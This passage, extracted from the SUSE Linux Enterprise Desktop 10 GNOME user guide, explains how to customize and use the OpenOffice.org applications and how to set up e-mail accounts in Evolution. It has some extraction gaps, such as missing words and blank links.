You can customize OpenOffice.org to best suit your needs and working style. Toolbars, menus, and keyboard shortcuts it to the Start Application event. This section contains simple, generic instructions for customizing your environment. The changes you make are effective immediately, so you can see if the changes are what you wanted and go back and modify them if they weren’t. See the OpenOffice.org help files for detailed instructions. Customizing Toolbars Use the Customize dialog to modify OpenOffice.org toolbars. 1 Click the arrow icon at the end of any toolbar. 2 Click Customize Toolbar. 3 Select the toolbar you want to customize. 4 Select the check boxes next to the commands you want to appear on the toolbar, and deselect the check boxes next to the commands you don’t want to appear. 5 Select whether to save your customized toolbar in the OpenOffice.org module you are using or in the document. • OpenOffice.org module
The OpenOffice.org Office Suite
69
novdocx (ENU) 01 February 2006
The customized toolbar is used whenever you open that module. • Document filename The customized toolbar is used whenever you open that document. 6 Repeat to customize additional toolbars. 7 Click OK. You can quickly choose the buttons that appear on a particular toolbar. 1 Click the arrow icon at the end of the toolbar you want to change. 2 Click Visible Buttons to display a list of buttons. 3 Select the buttons in the list that appears to enable (check) or disable (uncheck) them. Customizing Menus You can add or delete items from current menus, reorganize menus, and even create new menus. 1 Click Tools > Customize > Menu. 2 Select the menu you want to change, or click New to create a new menu. Click Help for more information about the options in the Customize dialog. 3 Modify, add, or delete menu items as desired. 4 Click OK. Customizing Keyboard Shortcuts You can reassign currently assigned keyboard shortcuts and assign new shortcuts to frequently used functions. 1 Click Tools > Customize > Keyboard. 2 Select the keys you want to assign to a function, or select the function and assign the keys or key combinations. Click Help for more information about the options in the Customize dialog. 3 Modify, add, or delete keyboard shortcuts as desired. 4 Click OK. Customizing Events OpenOffice.org also provides ways to assign macros to events such as application startup or the saving of a document. The assigned macro runs automatically whenever the selected event occurs. 1 Click Tools > Customize > Events. 2 Select the event you want to change. Click Help for more information about the options in the Customize dialog box. 3 Assign or remove macros for the selected event. 4 Click OK.
70
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Changing the Global Settings Global settings can be changed in any OpenOffice.org application by clicking Tools > Options on the menu bar. This opens the window shown in the figure below. A tree structure is used to display categories of settings.
Figure 3-1 The Options Window
The following table lists the settings categories along with a brief description of each category:
Table 3-2 Global Setting Categories
Settings Category
Description
OpenOffice.org Load/Save
Various basic settings, including your user data (such as your address and e-mail), important paths, and settings for printers and external programs. Includes the settings related to the opening and saving of several file types. There is a dialog for general settings and several special dialogs to define how external formats should be handled. Covers the various settings related to languages and writing aids, such as your locale and spell checker settings. This is also the place to enable support for Asian languages. Includes the dialogs to configure any proxies and to change settings related to search engines. Configures the global word processing options, such as the basic fonts and layout that Writer should use. Changes the settings related to the HTML authoring features of OpenOffice.org. Changes the settings for Calc, such as those related to sort lists and grids. Changes the settings that should apply to all presentations. For example, you can specify the measurement unit for the grid used to arrange elements. Includes the settings related to the vector drawing module, such as the drawing scale, grid properties, and some print options.
Language Settings
Internet Text Document HTML Document Spreadsheet Presentation
Drawing
The OpenOffice.org Office Suite
71
novdocx (ENU) 01 February 2006
Settings Category
Description
Formula Chart Data Sources
Provides a single dialog to set special print options for formulas. Defines the default colors used for newly created charts. Defines how external data sources should be accessed.
IMPORTANT: All settings listed in the table are applied globally. They are used as defaults for every new document you create.
3.1.8 Finding Templates
Templates greatly enhance the use of OpenOffice.org by simplifying formatting tasks for a variety of different types of documents. OpenOffice.org comes with a few templates, and you can find additional templates on the Internet. You can also create your own. Creating templates is beyond the scope of this guide, but detailed instructions are found in the OpenOffice.org help system and in other documents and tutorials available online. In addition to templates, you can find other extras and add-ins online. The following table lists a few of the prominent places where you can find templates and other extras. (Because Web sites often close or their content changes, the information in the following table might not be current when you read it.)
Table 3-3 Where to Find OpenOffice.org Templates and Extras
Location
What You Can Find
OpenOffice.org documentation Web site (http:// documentation.openoffice.org/ Samples_Templates/User/template_2_x/ index.html)
Templates for Calc spreadsheets, CD cases, seed packets, fax cover sheets, and more
Worldlabel.com ( Templates for many types of labels openoffice-template.htm)
For more information about templates, see Section 3.2.4, “Using Templates to Format Documents,” on page 76 and Section 3.3.2, “Using Templates in Calc,” on page 79.
3.2 Word Processing with Writer
OpenOffice.org Writer is a full-featured word processor with page and text formatting capabilities. Its interface is similar to interfaces for other major word processors, and it includes some features that are usually found only in expensive desktop publishing applications. This section highlights a few key features of Writer. For more information about these features and for complete instructions for using Writer, look at the OpenOffice.org help or any of the sources listed in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84.
72
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
NOTE: Much of the information in this section can also be applied to other OpenOffice.org modules. For example, other modules use styles similarly to how they are used in Writer. • Section 3.2.1, “Creating a New Document,” on page 73 • Section 3.2.2, “Sharing Documents with Other Word Processors,” on page 73 • Section 3.2.3, “Formatting with Styles,” on page 74 • Section 3.2.4, “Using Templates to Format Documents,” on page 76 • Section 3.2.5, “Working with Large Documents,” on page 76 • Section 3.2.6, “Using Writer as an HTML Editor,” on page 78
3.2.1 Creating a New Document
There are two ways to create a new document: To create a document from scratch, click File > New > Text Document. To use a standard format and predefined elements for your own documents, try a wizard. Wizards are small utilities that let you make some basic decisions then produce a ready-made document from a template. For example, to create a business letter, click File > Wizards > Letter. Using the wizard's dialogs, easily create a basic document using a standard format. A sample wizard dialog is shown in Figure 3-2.
Figure 3-2 An OpenOffice.org Wizard
Enter text in the document window as desired. Use the Formatting toolbar or the Format menu to adjust the appearance of the document. Use the File menu or the relevant buttons in the toolbar to print and save your document. With the options under Insert, add extra items to your document, such as a table, picture, or chart.
3.2.2 Sharing Documents with Other Word Processors
You can use Writer to edit documents created in a variety of other word processors. For example, you can import a Microsoft Word document, edit it, and save it again as a Word document. Most
The OpenOffice.org Office Suite
73
novdocx (ENU) 01 February 2006
Word documents can be imported into OpenOffice.org without any problem. Formatting, fonts, and all other aspects of the document remain intact. However, some very complex documents—such as documents containing complicated tables, Word macros, or unusual fonts or formatting—might require some editing after being imported. OpenOffice.org can also save in many popular word processing formats. Likewise, documents created in OpenOffice.org and saved as Word files can be opened in Microsoft Word without any trouble. So, if you use OpenOffice.org in an environment where you frequently share documents with Word users, you should have little or no trouble exchanging document files. Just open the files, edit them, and save them as Word files.
3.2.3 Formatting with Styles
OpenOffice.org uses styles for applying consistent formatting to various elements in a document. The following types of styles are available:
Table 3-4 About the Types of Styles
Type of Style
What it Does
Paragraph
Applies standardized formatting to the various types of paragraphs in your document. For example, apply a paragraph style to a first-level heading to set the font and font size, spacing above and below the heading, location of the heading, and other formatting specifications. Applies standardized formatting for types of text. For example, if you want emphasized text to appear in italics, you can create an emphasis style that italicizes selected text when you apply the style to it. Applies standardized formatting to frames. For example, if your document uses sidebars, you can create frames with specified graphics, borders, location, and other formatting so that all of your sidebars have a consistent appearance. Applies standardized formatting to a specified type of page. For example, if every page of your document contains a header and footer except for the first page, you can use a first page style that disables headers and footers. You can also use different page styles for left and right pages so that you have bigger margins on the insides of pages and your page numbers appear on an outside corner. Applies standardized formatting to specified list types. For example, you can define a checklist with square check boxes and a bullet list with round bullets, then easily apply the correct style when creating your lists.
Character
Frame
Page
List
Opening the Styles and Formatting Window The Styles and Formatting window (called the Stylist in earlier versions of OpenOffice.org), is a versatile formatting tool for applying styles to text, paragraphs, pages, frames, and lists. To open this window, click Format > Styles and Formatting. OpenOffice.org comes with several predefined styles. You can use these styles as they are, modify them, or create new styles. TIP: By default, the Styles and Formatting window is a floating window; that is, it opens in its own window that you can place anywhere on the screen. If you use styles extensively, you might find it helpful to dock the window so that it always present in the same part of the Writer interface. To dock
74
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
the Styles and Formatting window, press Control while you double-click on a gray area in the window. This tip applies to some other windows in OpenOffice.org as well, including the Navigator. Applying a Style To apply a style, select the element you want to apply the style to, and then double-click the style in the Styles and Formatting window. For example, to apply a style to a paragraph, place the cursor anywhere in that paragraph and double-click the desired style. Using Styles Versus Using Formatting Buttons and Menu Options Using styles rather than the Format menu options and buttons helps give your pages, paragraphs, texts, and lists a more consistent look and makes it easier to change your formatting. For example, if you emphasize text by selecting it and clicking the Bold button, then later decide you want emphasized text to be italicized, you need to find all of your bolded text and manually change it to italics. If you use a character style, you only need to change the style from bold to italics and all text that has been formatted with that style automatically changes from bold to italics. Text formatted with a menu option or button overrides any styles you have applied. If you use the Bold button to format some text and an emphasis style to format other text, then changing the style does not change the text that you formatted with the button, even if you later apply the style to the text you bolded with the button. You must manually unbold the text and then apply the style. Likewise, if you manually format your paragraphs using Format > Paragraph, it is easy to end up with inconsistent paragraph formatting. This is especially true if you copy and paste paragraphs from other documents with different formatting. Changing a Style Styles are powerful because you can change formatting throughout a document by changing a style, rather than applying the change separately everywhere you want to apply the new formatting. 1 In the Styles and Formatting window, right-click the style you want to change. 2 Click Modify. 3 Change the settings for the selected style. For information about the available settings, refer to the OpenOffice.org online help. 4 Click OK. Creating a Style OpenOffice.org comes with a collection of styles to suit many users’ needs. However, most users eventually need a style that does not yet exist. To create a new style: 1 Right-click in any empty space in the Styles and Formatting window. Make sure you are in the list of styles for the type of style you want to create. For example, if you are creating a character style, make sure you are in the character style list. 2 Click New. 3 Click OK. 4 Name your style and choose the settings you want applied with that style.
The OpenOffice.org Office Suite
75
novdocx (ENU) 01 February 2006
For details about the style options available in any tab, click that tab and then click Help.
3.2.4 Using Templates to Format Documents
Most word processor users create more than one kind of document. For example, you might write letters, memos, and reports, all of which look different and require different styles. If you create a template for each of your document types, the styles you need for each document are always readily available. Creating a template requires a little bit of up-front planning. You need to determine what you want the document to look like so you can create the styles you need in that template. You can always change your template, but a little planning can save you a lot of time later. NOTE: You can convert Microsoft Word templates like you would any other Word document. See “Converting Documents to the OpenOffice.org Format” on page 68 for information. A detailed explanation of templates is beyond the scope of this section. However, more information is found in the help system, and detailed how-tos are found at the OpenOffice.org Documentation page (). Creating a Template A template is a text document containing only the styles and content that you want to appear in every document, such as your address information and letterhead on a letter. When a document is created or opened with the template, the styles are automatically applied to that document. To create a template: 1 Click File > New > Text Document. 2 Create the styles and content that you want to use in any document that uses this template. 3 Click File > Templates > Save. 4 Specify a name for the template. 5 In the Categories box, click the category you want to place the template in. The category is the folder where the template is stored. 6 Click OK.
3.2.5 Working with Large Documents
You can use Writer to work on large documents. Large documents can be either a single file or a collection of files assembled into a single document. Navigating in Large Documents The Navigator tool displays information about the contents of a document. It also lets you quickly jump to different elements. For example, you can use the Navigator to get a quick overview of all images included in the document.
76
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
To open the Navigator, click Edit > Navigator. The elements listed in the Navigator vary according to the document loaded in Writer.
Figure 3-3 Navigator Tool in Writer
Click an item in the Navigator to jump to that item in the document. Creating a Single Document from Multiple Documents individual Writer files. You can maintain chapters or other subdocuments as individual files collected in the master document. Master documents are also useful if multiple people are working on a document. You can separate each person’s portion of the document into subdocuments collected in a master document, allowing multiple writers to work on their subdocuments at the same time without fear of overwriting other people’s work. NOTE: If you are coming to OpenOffice.org from Microsoft Word, you might be nervous about using master documents because the master document feature in Word has a reputation for corrupting documents. This problem does not exist in OpenOffice.org Writer, so you can safely use master documents to manage your projects. To create a master document: 1 Click New > Master Document. or Open an existing document and click File > Send > Create Master Document. 2 Insert subdocuments. 3 Click File > Save. The OpenOffice.org help files contain more complete information about working with master documents. Look for the topic entitled “Using Master Documents and Subdocuments.”
The OpenOffice.org Office Suite
77
novdocx (ENU) 01 February 2006
TIP: The styles from all of your subdocuments are imported into the master document. To ensure that formatting is consistent throughout your master document, you should use the same template for each subdocument. Doing so is not mandatory; however, if subdocuments are formatted differently, you will probably need to do some reformatting to successfully bring subdocuments into the master document without creating inconsistencies. For example, if two documents imported into your master document include different styles with the same name, the master document will use the formatting specified for that style in the first document you import.
3.2.6 Using Writer as an HTML Editor
In addition to being a full-featured word processor, Writer also functions as an HTML editor. Writer includes HTML tags that can be applied as you would any other style in a Writer document. You can view the document as it will appear online, or you can directly edit the HTML code. Creating an HTML Document 1 Click File > New > HTML Document. 2 Click the arrow at the bottom of the Formatting and Styles window. 3 Select HTML Styles. 4 Create your HTML document, using the styles to tag your text. 5 Click File > Save As. 6 Select the location where you want to save your file, name the file, and select HTML Document (.html) from the Filter list. 7 Click OK. If you prefer to edit HTML code directly, or if you want to see the HTML code created when you edited the HTML file as a Writer document, click View > HTML Source. In HTML Source mode, the Formatting and Styles list is no longer available. NOTE: The first time you switch to HTML Source mode, you are prompted to save the file as HTML, if you have not already done so.
3.3 Using Spreadsheets with Calc
Calc is the OpenOffice.org spreadsheet application. Create a new spreadsheet with File > New > Spreadsheet or open one with File > Open. Calc can read and save in Microsoft Excel's format, so it is easy to exchange spreadsheets with Excel users. NOTE: Calc can process many VBA macros in Excel documents; however, support for VBA macros is not yet complete. When opening an Excel spreadsheet that makes heavy use of macros, you might discover that some do not work. In the spreadsheet cells, enter fixed data or formulas. A formula can manipulate data from other cells to generate a value for the cell in which it is inserted. You can also create charts from cell values. • Section 3.3.1, “Using Formatting and Styles in Calc,” on page 79 • Section 3.3.2, “Using Templates in Calc,” on page 79
78
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
3.3.1 Using Formatting and Styles in Calc
Calc comes with a few built-in cell and page styles to improve the appearance of your spreadsheets and reports. Although these built-in styles are adequate for many uses, you will probably find it useful to create styles for your own frequently used formatting preferences. Creating a Style 1 Click Format > Styles and Formatting. 2 In the Formatting and Styles window, click either the Cell Styles or the Page Styles icon. 3 Right-click in the Formatting and Styles window, then click New. 4 Specify a name for your style and use the various tabs to set the desired formatting options. 5 Click OK. Modifying a Style 1 Click Format > Styles and Formatting. 2 In the Formatting and Styles window, click either the Cell Styles or the Page Styles icon. 3 Right-click the name of the style you want to change, then click Modify. 4 Change the desired formatting options. 5 Click OK.
3.3.2 Using Templates in Calc
If you use different styles for different types of spreadsheets, you can use templates to save your styles for each spreadsheet type. Then, when you create a particular type of spreadsheet, open the applicable template and the styles you need for that template are available in the Formatting and Styles window. A detailed explanation of templates is beyond the scope of this section. However, more information is found in the help system and detailed how-tos are found at the OpenOffice.org Documentation page (). Creating a Template A Calc template is a spreadsheet that contains styles and content that you want to appear in every spreadsheet created with that template, such as headings or other cell styles. When a spreadsheet is created or opened with the template, the styles are automatically applied to that spreadsheet. To create a template: 1 Click File > New > Spreadsheet. 2 Create the styles and content that you want to use in any spreadsheet that uses this template. 3 Click File > Templates > Save. 4 Specify a name for the template. 5 In the Categories box, click the category you want to place the template in. The category is the folder where the template is stored. 6 Click OK.
The OpenOffice.org Office Suite
79
novdocx (ENU) 01 February 2006
3.4 Using Presentations with Impress
Use OpenOffice.org. • Section 3.4.1, “Creating a Presentation,” on page 80 • Section 3.4.2, “Using Master Pages,” on page 80
3.4.1 Creating a Presentation
1 Click File > New > Presentation. 2 Select the option to use for creating the presentation. There are two ways to create a presentation: • Create an empty presentation Opens Impress with a blank slide. Use this option to create a new presentation from scratch, without any preformatted slides. • Create a presentation from a template Opens Impress with your choice of template. Use this option to create a new presentation with a predesigned OpenOffice.org template or a template you’ve created or installed yourself, such as your company’s presentation template. Impress uses styles and templates the same way other OpenOffice.org modules do. See Section 3.2.4, “Using Templates to Format Documents,” on page 76 for more information about templates.
3.4.2 Using Master Pages
Master pages give your presentation a consistent look by defining the way each slide looks, what fonts are used, and other graphical elements. Impress uses two types of master pages: • Slide master. • Notes master Determines the formatting and appearance of the notes in your presentation. Creating a Slide Master Impress comes with a collection of preformatted master pages. Eventually, most users will want to customize their presentations by creating their own slide masters. 1 Start Impress, then create a new empty presentation. 2 Click View > Master > Slide Master. This opens the current slide master in Master View.
80
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
3 Right-click the left-hand panel, then click New Master. 4 Edit the slide master until it has the desired look. 5 Click Close Master View or View > Normal to return to Normal View. TIP: When you have created all of the slide masters you want to use in your presentations, you can save them in an Impress template. Then, any time you want to create presentations that use those slide masters, open a new presentation with your template. Applying a Slide Master Slide masters can be applied to selected slides or to all slides in the presentation. 1 Open your presentation, then click View > Master > Slide Master. 2 (Optional) If you want to apply the slide master to multiple slides, but not to all slides, select the slides that you want to use that slide master. To select multiple slides, in the Slides Pane, Control-click on the slides you want to use that slide master. 3 In the Task Pane, right-click the master page you want to apply. If you do not see the Task Pane, click View > Task Pane. 4 Apply the slide master by clicking one of the following:. • Apply to All Slides Applies the selected slide master to all slides in the presentation. • Apply to Selected Slides Applies the selected slide master to the current slide, or to any slides you select before applying the slide master. For example, if you want to apply a different slide master to the first slide in a presentation, select that slide, then change to Master View and apply a slide master to that slide.
3.5 Using Databases with Base
OpenOffice 2.0 introduces a new. Databases created in Base can be used as data sources, such as when creating form letters. It is beyond the scope of this document to detail database design with Base. More information can be found at the sources listed in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84.
3.5.1 Creating a Database Using Predefined Options
Base comes with several predefined database fields to help you create a database. The steps in this section are specific to creating an address book using predefined fields, but it should be easy to follow them to use the predefined fields for any of the built-in database options.
The OpenOffice.org Office Suite
81
novdocx (ENU) 01 February 2006
The process for creating a database can be broken into several subprocesses: • “Creating the Database” on page 82 • “Setting Up the Database Table” on page 82 • “Creating a Form” on page 83 • “Modifying the Form” on page 83 • “What’s Next?” on page 83 Creating the Database First, create the database. 1 Click File > New > Database. 2 Select Create a new database, then click Next. 3 Click Yes, register the database for me to make your database information available to other OpenOffice.org modules, select both check boxes in the bottom half of the dialog, then click Finish. 4 Browse to the directory where you want to save the database, specify a name for the database, then click OK. Setting Up the Database Table Next, define the fields you want to use in your database table. 1 In the Table Wizard, click Personal. The Sample tables list changes to show the predefined tables for personal use. If you had clicked Business, the list would contain predefined business tables. 2 In the Sample tables list, click Addresses. The available fields for the predefined address book appear in the Available fields menu. 3 In the Available fields menu, click the fields you want to use in your address book. You can select one item at a time, or you can shift-click multiple items to select them. 4 Click the single right-arrow to move the selected items to the Selected fields menu. To move all available fields to the Selected fields menu, click the double right-arrow. 5 Use the up-arrow and down-arrow to adjust the order of the selected fields. The fields appear in the table and forms in the order in which they are listed. 6 Click Next. 7 Make sure each of the fields is defined correctly. You can change the field name, type, whether the entry is required, and the maximum length of the field (the number of characters that can be entered in that field. For this example, leave the settings as they are. 8 Click Next. 9 Click Create a primary key, click Automatically add a primary key, click Auto value, then click Next. 10 Accept the default name for the table, select Create a form based on this table, then click Finish.
82
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Creating a Form Next, create the form to use when entering data into your address book. 1 In the Form Wizard, click the double right-arrow to move all available fields to the Fields in the form list, then click Next twice. 2 Select how you want to arrange your form, then click Next. 3 Select the option to use the form to display all data and leave all of the check boxes empty, then click Next. 4 Apply a style and field border, then click Next. For this example, accept the default selections. 5 Name the form, select the Modify the form option, then click Finish. Modifying the Form After the form has been defined, you can modify the appearance of the form to suit your preferences. 1 Close the form that opened when you finished the previous step. 2 In the main window for your database, right-click the form you want to modify (there should be only one option), then click Edit. 3 Arrange the fields on the form by dragging them to their new locations. For example, move the First Name field so it appears to the right of the Last Name field, and then adjust the locations of the other fields to suit your preference. 4 When you have finished modifying the form, save it and close it. What’s Next? After you have created your database tables and forms, you are ready to enter your data. You can also design queries and reports to help sort and display the data. Refer to OpenOffice.org online help and other sources listed in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84 for additional information about Base.
3.6 Creating Graphics with Draw
Use OpenOffice.org Draw to create graphics and diagrams. You can save your drawings in today’s most common formats and import them into any application that lets you import graphics, including the other OpenOffice.org modules. You can also create Flash versions of your drawings. The OpenOffice.org documentation contains complete instructions on using Draw. See Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84 for more information. To use a Draw graphic in a document: 1 Open Draw, then create the graphic. 2 Save the graphic. 3 Copy the graphic and paste it into the document, or insert the graphic directly from the document.
The OpenOffice.org Office Suite
83
novdocx (ENU) 01 February 2006
One particularly useful feature of Draw is the ability to open it from other OpenOffice.org modules so you can create a drawing that is automatically imported into your document. 1 From an OpenOffice.org module (for example, from Writer), click Insert > Object > OLE Object > OpenOffice.org 2.0 Drawing > OK. This opens Draw. 2 Create your drawing. 3 Click in your document, outside the Draw frame. The drawing is automatically inserted into your document.
3.7 Creating Mathematical Formulas with Math
It is usually difficult to include complex mathematical formulas in your documents. The OpenOffice.org Math equation editor lets you create formulas using operators, functions, and formatting assistants. You can then save those formulas as objects that can be imported into other documents. Math functions can be inserted into other OpenOffice.org documents like any other graphic object. NOTE: Math is not a calculator. The functions it creates are graphical objects. Even if they are imported into Calc, these functions cannot be evaluated.
3.8 Finding Help and Information About OpenOffice.org
OpenOffice.org contains extensive online help. In addition, a large community of users and developers support it. As a result, it is seldom hard to find help or information about using the OpenOffice.org. The following table shows some of the places where you can go for additional information. (Because Web sites often close or their content changes, the information in the following table might not be current when you read it.)
Table 3-5 Where to Get Information About OpenOffice.org
Location
What You Can Find
OpenOffice.org online help menu Official OpenOffice.org support page (http:// support.openoffice.org/index.html) OpenOffice.org Migration Guide (oooauthors.org/ en/authors/userguide2/migration/ OtherMSOFiles_25_June_PK.sxw) Taming OpenOffice.org () OpenOffice.org Macros ( oo.php)
Extensive help on performing any task in OpenOffice.org Manuals, tutorials, user and developer forums, [email protected] mailing list, FAQs, and much more Information about migrating to OpenOffice.org from other office suites, including Microsoft Office Books, news, tips and tricks Extensive information about creating and using macros
84
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
4
Evolution: E-Mail and Calendaring
4
EvolutionTM several search folders, which let you save searches as though they were ordinary e-mail folders. This chapter introduces you to Evolution and helps you get started using it. For complete information, refer to the Evolution documentation. • Section 4.1, “Starting Evolution for the First Time,” on page 85 • Section 4.2, “Using Evolution: An Overview,” on page 93
4.1 Starting Evolution for the First Time
Start the Evolution client by clicking Computer > Evolution Mail and Calendar, or by typing evolution in a terminal window.
4.1.1 Using the First-Run Assistant
The first time you run Evolution, it creates a directory called .evolution in your home directory, where it stores all of its local data. Then, it opens a First-Run Assistant to help you set up e-mail accounts and import data from other applications. Using the first-run assistant takes two to five minutes. Later on, if you want to change this account, or if you want to create a new one, click Edit > Preferences, then click Mail Accounts. Select the account you want to change, then click Edit. Alternately, add a new account by clicking Add. The First-Run Assistant helps you provide the information Evolution needs to get started. • “Defining Your Identity” on page 86 • “Receiving Mail” on page 86 • “Receiving Mail Options” on page 88 • “Sending Mail” on page 91 • “Account Management” on page 92 • “Time Zone” on page 92 • “Importing Mail (Optional)” on page 92
Evolution: E-Mail and Calendaring
85
novdocx (ENU) 01 February 2006
Defining Your Identity The Identity window is the first step in the assistant. Here, you enter some basic personal information. You can define multiple identities later by clicking Edit > Preferences, then clicking Mail Accounts. When the First-Run Assistant starts, the Welcome page is displayed. Click Forward to proceed to the Identity window. 1 Type your full name in the Full Name field. 2 Type your e-mail address in the E-Mail Address field. 3 (Optional) Type a reply to address in the Reply-To field. Use this field if you want replies to e-mails sent to a different address. 4 (Optional) Select if this account is your default account. 5 (Optional) Type your organization name in the Organization field. This is the company where you work, or the organization you represent when you send e-mail. 6 Click Forward. Receiving Mail The Receiving E-mail option lets you determine where you get your e-mail. You need to specify the type of server you want to receive mail with. If you are unsure about the type of server to choose, ask your system administrator or ISP. 1 Select a server type in the Server Type list. The following a list of server types that are available: Novell GroupWise: Select this option if you connect to Novell GroupWise®. Novell GroupWise keeps e-mail, calendar, and contact information on the server. Microsoft Exchange: Available only if you have installed the Connector for Microsoft* Exchange. It allows you to connect to a Microsoft Exchange 2000 or 2003 server, which stores e-mail, calendar, and contact information on the server. IMAP: Keeps the e-mail on your server so you can access your e-mail from multiple systems. IMAP4rev1: Keeps the e-mail on your server so you can access your e-mail from multiple systems. POP: Downloads your e-mail to your hard disk for permanent storage, freeing up space on the e-mail server. USENET News: Connects to the news server and downloads a list of available news digests. Local Delivery: Choose this option if you want to move e-mail from the spool (the location where mail waits for delivery) and store it in your home directory. You need to provide the path to the mail spool you want to use. If you want to leave e-mail in your system’s spool files, choose the Standard Unix Mbox Spool option instead.
86
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
MH Format Mail Directories: If you download your e-mail using mh or another MH-style program, you should use this option. You need to provide the path to the mail directory you want to use. Maildir Format Mail Directories: If you download your e-mail using Qmail or another maildir-style program, you should use this option. You need to provide the path to the mail directory you want to use. Standard Unix Mbox Spool or Directory: If you want to read and store e-mail in the mail spool on your local system, choose this option. You need to provide the path to the mail spool you want to use. None: Select this if you do not plan to check e-mail with this account. If you select this, there are no configuration options. Remote Configuration Options If you selected Novell GroupWise, IMAP, POP, or USENET News as your server, you need to specify additional information. 1 Type the hostname of your e-mail server in the Hostname field. If you don’t know the hostname, contact your administrator. 2 Type your username for the account in the Username field. 3 Select to use a secure (SSL) connection. If your server supports secure connections, you should enable this security option. If you are unsure if your server supports a secure connection, contact your system administrator. 4 Select your authentication type in the Authentication list. or Click Check for Supported Types to have Evolution check for supported types. Some servers do not announce the authentication mechanisms they support, so clicking this button is not a guarantee that available mechanisms actually work. If you are unsure what authentication type you need, contact your system administrator. 5 Select if you want Evolution to remember your password. 6 Click Forward. 7 (Conditional) If you chose Microsoft Exchange, provide your username in the Username field and your Outlook Web Access (OWA) URL in the OWA Url field. OWA URL and user names should be entered as in OWA. If the mail box path is different from the username, OWA path should include mail box path also. You should see something similar to this: http://<server name>/exchange/<mail box path> When you have finished, continue with “Receiving Mail Options” on page 88. Local Configuration Options If you selected Local Delivery, MH-Format Mail Directories, Maildir-Format Mail Directories, or Standard Unix Mbox Spool or Directory, you must specify the path to the local files in the path field. Continue with “Receiving Mail Options” on page 88.
Evolution: E-Mail and Calendaring
87
novdocx (ENU) 01 February 2006
Receiving Mail Options After you have selected a mail delivery mechanism, you can set some preferences for its behavior. • “Novell GroupWise Receiving Options” on page 88 • “Microsoft Exchange Receiving Options” on page 88 • “IMAP and IMAP4rev1 Receiving Options” on page 89 • “POP Receiving Options” on page 89 • “USENET News Receiving Options” on page 90 • “Local Delivery Receiving Options” on page 90 • “MH-Format Mail Directories Receiving Options” on page 90 • “Maildir-Format Mail Directories Receiving Options” on page 90 • “Standard Unix Mbox Spool or Directory Receiving Options” on page 91 Novell GroupWise Receiving Options If you select Novell GroupWise as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Select if you want to check for new messages in all folders. 3 Select if you want to apply filters to new messages in the Inbox on the server. 4 Select if you want to check new messages for junk content. 5 Select if you want to only check for junk messages in the Inbox folder. 6 Select if you want to automatically synchronize remote mail locally. 7 Type your Post Office Agent SOAP port in the Post Office Agent SOAP Port field. If you are unsure what your Post Office Agent SOAP port is, contact your system administrator. 8 Click Forward. When you have finished, continue with Sending Mail. Microsoft Exchange Receiving Options If you select Microsoft Exchange as your receiving server type, you need to specify the following options. 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Specify the Global Catalog server name in the Global Catalog Server Name field. The Global Catalog Server contains the user information for users. If you are unsure what your Global Catalog server name is, contact your system administrator. 3 Select if you want to limit the number of Global Address Lists (GAL).
88
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
The GAL contains a list of all e-mail addresses. If you select this option, you need to specify the maximum number of responses. 4 Select if you want the password expire warning period. If you select this option, you need to specify how often Evolution should send the password expire message. 5 Select if you want to automatically synchronize remote mail locally. 6 Click Forward. When you have finished, continue with Sending Mail. IMAP and IMAP4rev1 Receiving Options If you select IMAP or IMAP4rev1 as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Select if you want Evolution to use custom commands to connect to Evolution. If you select this option, specify the custom command you want Evolution to use. 3 Select if you want Evolution to show only subscribed folders. Subscribed folders are folders that you have chosen to receive mail from by subscribing to them. 4 Select if you want Evolution to override server-supplied folder namespaces. By choosing this option you can rename the folders that the server provides. If you select this option, you need to specify the namespace to use. 5 Select if you want to apply filters to new messages in the Inbox. 6 Select if you want to check new messages for junk content. 7 Select if you want to check for junk messages in the Inbox folder. 8 Select if you want to automatically synchronize remote mail locally. 9 Click Forward. When you have finished, continue with Sending Mail. POP Receiving Options If you select POP as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Select if you want to leave messages on the server. 3 Select if you want to disable support for all POP3 extensions (support for POP3). 4 Click Forward. When you have finished, continue with Sending Mail.
Evolution: E-Mail and Calendaring
89
novdocx (ENU) 01 February 2006
USENET News Receiving Options If you select USENET News as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Select if you want to show folders in short notation. For example, comp.os.linux would appear as c.o.linux. 3 Select if you want to show relative folder names in the subscription dialog box. If you select to show relative folder names in the subscription page, only the name of the folder is displayed. For example the folder evolution.mail would appear as evolution. 4 Click Forward. When you have finished, continue with Sending Mail. Local Delivery Receiving Options If you select Local Delivery as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Click Forward. When you have finished, continue with Sending Mail. MH-Format Mail Directories Receiving Options If you select MH-Format Mail Directories as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Select if you want to user the .folders summary file. 3 Click Forward. When you have finished, continue with Sending Mail. Maildir-Format Mail Directories Receiving Options If you select Maildir-Format Mail Directories as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
90
